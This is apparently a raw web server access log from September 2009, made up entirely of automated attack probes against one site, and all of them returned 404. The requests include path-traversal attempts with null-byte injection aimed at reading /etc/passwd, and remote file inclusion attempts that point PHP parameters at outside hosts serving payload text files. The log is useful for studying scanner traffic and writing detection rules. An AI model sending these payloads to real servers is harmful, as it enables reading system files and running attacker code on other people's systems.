121.78.116.209 - - [04/Sep/2009:05:31:36 -0400] "GET /logs/access_log.Q109071100%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
201.76.47.207 - - [04/Sep/2009:05:33:07 -0400] "GET /logs/access_log.Q109062900/footer.php?c_temp_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.76.47.207 - - [04/Sep/2009:05:33:07 -0400] "GET /logs/access_log.Q109062900/footer.php?c_temp_path=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.76.47.207 - - [04/Sep/2009:05:33:07 -0400] "GET /footer.php?c_temp_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
201.76.47.207 - - [04/Sep/2009:05:33:07 -0400] "GET /footer.php?c_temp_path=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
201.76.47.207 - - [04/Sep/2009:05:33:07 -0400] "GET /logs/footer.php?c_temp_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
201.76.47.207 - - [04/Sep/2009:05:33:07 -0400] "GET /logs/footer.php?c_temp_path=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
110.45.146.223 - - [04/Sep/2009:05:34:48 -0400] "GET //skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:34:48 -0400] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:34:48 -0400] "GET /logs/access_log.Q109080100//skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:34:53 -0400] "GET //skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
